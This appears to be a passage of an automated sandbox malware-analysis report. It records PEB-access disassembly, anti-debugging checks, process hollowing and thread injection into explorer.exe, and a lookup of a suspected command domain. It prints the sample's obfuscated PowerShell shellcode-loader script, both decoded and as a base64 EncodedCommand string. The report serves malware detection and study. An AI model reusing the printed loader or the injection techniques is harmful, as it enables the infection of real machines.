Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h] 22_2_0323B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h] 22_2_0323B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h] 22_2_0323B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F4015 mov eax, dword ptr fs:[00000030h] 22_2_032F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F4015 mov eax, dword ptr fs:[00000030h] 22_2_032F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h] 22_2_032A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h] 22_2_032A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h] 22_2_032A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F1074 mov eax, dword ptr fs:[00000030h] 22_2_032F1074
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032E2073 mov eax, dword ptr fs:[00000030h] 22_2_032E2073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03240050 mov eax, dword ptr fs:[00000030h] 22_2_03240050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03240050 mov eax, dword ptr fs:[00000030h] 22_2_03240050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032690AF mov eax, dword ptr fs:[00000030h] 22_2_032690AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325F0BF mov ecx, dword ptr fs:[00000030h] 22_2_0325F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325F0BF mov eax, dword ptr fs:[00000030h] 22_2_0325F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325F0BF mov eax, dword ptr fs:[00000030h] 22_2_0325F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229080 mov eax, dword ptr fs:[00000030h] 22_2_03229080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A3884 mov eax, dword ptr fs:[00000030h] 22_2_032A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A3884 mov eax, dword ptr fs:[00000030h] 22_2_032A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032258EC mov eax, dword ptr fs:[00000030h] 22_2_032258EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov ecx, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03224F2E mov eax, dword ptr fs:[00000030h] 22_2_03224F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03224F2E mov eax, dword ptr fs:[00000030h] 22_2_03224F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325E730 mov eax, dword ptr fs:[00000030h] 22_2_0325E730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F070D mov eax, dword ptr fs:[00000030h] 22_2_032F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F070D mov eax, dword ptr fs:[00000030h] 22_2_032F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A70E mov eax, dword ptr fs:[00000030h] 22_2_0325A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A70E mov eax, dword ptr fs:[00000030h] 22_2_0325A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324F716 mov eax, dword ptr fs:[00000030h] 22_2_0324F716
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BFF10 mov eax, dword ptr fs:[00000030h] 22_2_032BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BFF10 mov eax, dword ptr fs:[00000030h] 22_2_032BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323FF60 mov eax, dword ptr fs:[00000030h] 22_2_0323FF60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F8F6A mov eax, dword ptr fs:[00000030h] 22_2_032F8F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323EF40 mov eax, dword ptr fs:[00000030h] 22_2_0323EF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03238794 mov eax, dword ptr fs:[00000030h] 22_2_03238794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h] 22_2_032A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h] 22_2_032A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h] 22_2_032A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032637F5 mov eax, dword ptr fs:[00000030h] 22_2_032637F5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322E620 mov eax, dword ptr fs:[00000030h] 22_2_0322E620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032DFE3F mov eax, dword ptr fs:[00000030h] 22_2_032DFE3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h] 22_2_0322C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h] 22_2_0322C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h] 22_2_0322C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03258E00 mov eax, dword ptr fs:[00000030h] 22_2_03258E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032E1608 mov eax, dword ptr fs:[00000030h] 22_2_032E1608
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A61C mov eax, dword ptr fs:[00000030h] 22_2_0325A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A61C mov eax, dword ptr fs:[00000030h] 22_2_0325A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323766D mov eax, dword ptr fs:[00000030h] 22_2_0323766D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EAE44 mov eax, dword ptr fs:[00000030h] 22_2_032EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EAE44 mov eax, dword ptr fs:[00000030h] 22_2_032EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h] 22_2_032F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h] 22_2_032F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h] 22_2_032F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A46A7 mov eax, dword ptr fs:[00000030h] 22_2_032A46A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BFE87 mov eax, dword ptr fs:[00000030h] 22_2_032BFE87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032376E2 mov eax, dword ptr fs:[00000030h] 22_2_032376E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032516E0 mov ecx, dword ptr fs:[00000030h] 22_2_032516E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03268EC7 mov eax, dword ptr fs:[00000030h] 22_2_03268EC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032536CC mov eax, dword ptr fs:[00000030h] 22_2_032536CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032DFEC0 mov eax, dword ptr fs:[00000030h] 22_2_032DFEC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F8ED6 mov eax, dword ptr fs:[00000030h] 22_2_032F8ED6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322AD30 mov eax, dword ptr fs:[00000030h] 22_2_0322AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EE539 mov eax, dword ptr fs:[00000030h] 22_2_032EE539
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F8D34 mov eax, dword ptr fs:[00000030h] 22_2_032F8D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032AA537 mov eax, dword ptr fs:[00000030h] 22_2_032AA537
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h] 22_2_03254D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h] 22_2_03254D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h] 22_2_03254D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324C577 mov eax, dword ptr fs:[00000030h] 22_2_0324C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324C577 mov eax, dword ptr fs:[00000030h] 22_2_0324C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03263D43 mov eax, dword ptr fs:[00000030h] 22_2_03263D43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A3540 mov eax, dword ptr fs:[00000030h] 22_2_032A3540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03247D50 mov eax, dword ptr fs:[00000030h] 22_2_03247D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F05AC mov eax, dword ptr fs:[00000030h] 22_2_032F05AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F05AC mov eax, dword ptr fs:[00000030h] 22_2_032F05AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032535A1 mov eax, dword ptr fs:[00000030h] 22_2_032535A1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h] 22_2_03251DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h] 22_2_03251DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h] 22_2_03251DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 mov eax, dword ptr fs:[00000030h] 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 mov eax, dword ptr fs:[00000030h] 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 mov eax, dword ptr fs:[00000030h] 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 mov eax, dword ptr fs:[00000030h] 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325FD9B mov eax, dword ptr fs:[00000030h] 22_2_0325FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325FD9B mov eax, dword ptr fs:[00000030h] 22_2_0325FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323D5E0 mov eax, dword ptr fs:[00000030h] 22_2_0323D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323D5E0 mov eax, dword ptr fs:[00000030h] 22_2_0323D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h] 22_2_032EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h] 22_2_032EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h] 22_2_032EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h] 22_2_032EFDE2
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA296E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_1EA296E0

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.ordemt.com
Sample uses process hollowing technique
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 8F0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #LACTIFERO brego Knobetsfri9 Hest3 Gruesom4 Generalis AFMEJ beaver BIBLIOGR Ddmandskn5 nullin lnpotsyste Threapedaf Outwres GTEVIV Unshackli8 corre LARMENSF Distingv8 disembo HYPE Unfil9 VANDBRNDA Genne Bemestre4 indpa Bitsyle Ternashe Kokard Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class brnecykl1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int brnecykl6,ref Int32 restbelb,int Dybb6,ref Int32 brnecykl,int applie,int brnecykl7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string imman,uint Hypogynyb,int Discipl3,int brnecykl0,int Petuniern,int Grungesmit,int Demoral5);[DllImport("kernel32.dll")]public static extern int ReadFile(int Dybb60,uint Dybb61,IntPtr Dybb62,ref Int32 Dybb63,int Dybb64);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Dybb65,int Dybb66,int Dybb67,int Dybb68,int Dybb69);}"@#Bisamschu Doven8 Caly Kuldioxid grafikruti Lkkern Kanoni9 Chel9 endeballen disk Tadeawouc4 Uitotanud8 Cutlassf4 Rhip8 Tendereeo reinhold Hjemviselu9 HURRS Omni6 Biggis5 Ohmav4 Buch Peggypara nvningedo FOELGESED Test-Path "soum" Test-Path "EXCLUD" $brnecykl3=0;$brnecykl9=1048576;$brnecykl8=[brnecykl1]::NtAllocateVirtualMemory(-1,[ref]$brnecykl3,0,[ref]$brnecykl9,12288,64)#SUPER STOCKILYR Stnkela5 emprost definitt Sepiabru1 topografer DRYPSTEN Frekv6 Delibe6 Matias3 husningkv Husm CHEESEFL vaag Thel Super5 sacrist
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #LACTIFERO brego Knobetsfri9 Hest3 Gruesom4 Generalis AFMEJ beaver BIBLIOGR Ddmandskn5 nullin lnpotsyste Threapedaf Outwres GTEVIV Unshackli8 corre LARMENSF Distingv8 disembo HYPE Unfil9 VANDBRNDA Genne Bemestre4 indpa Bitsyle Ternashe Kokard Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class brnecykl1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int brnecykl6,ref Int32 restbelb,int Dybb6,ref Int32 brnecykl,int applie,int brnecykl7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string imman,uint Hypogynyb,int Discipl3,int brnecykl0,int Petuniern,int Grungesmit,int Demoral5);[DllImport("kernel32.dll")]public static extern int ReadFile(int Dybb60,uint Dybb61,IntPtr Dybb62,ref Int32 Dybb63,int Dybb64);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Dybb65,int Dybb66,int Dybb67,int Dybb68,int Dybb69);}"@#Bisamschu Doven8 Caly Kuldioxid grafikruti Lkkern Kanoni9 Chel9 endeballen disk Tadeawouc4 Uitotanud8 Cutlassf4 Rhip8 Tendereeo reinhold Hjemviselu9 HURRS Omni6 Biggis5 Ohmav4 Buch Peggypara nvningedo FOELGESED Test-Path "soum" Test-Path "EXCLUD" $brnecykl3=0;$brnecykl9=1048576;$brnecykl8=[brnecykl1]::NtAllocateVirtualMemory(-1,[ref]$brnecykl3,0,[ref]$brnecykl9,12288,64)#SUPER STOCKILYR Stnkela5 emprost definitt Sepiabru1 topografer DRYPSTEN Frekv6 Delibe6 Matias3 husningkv Husm CHEESEFL vaag Thel Super5 sacrist Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3424 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
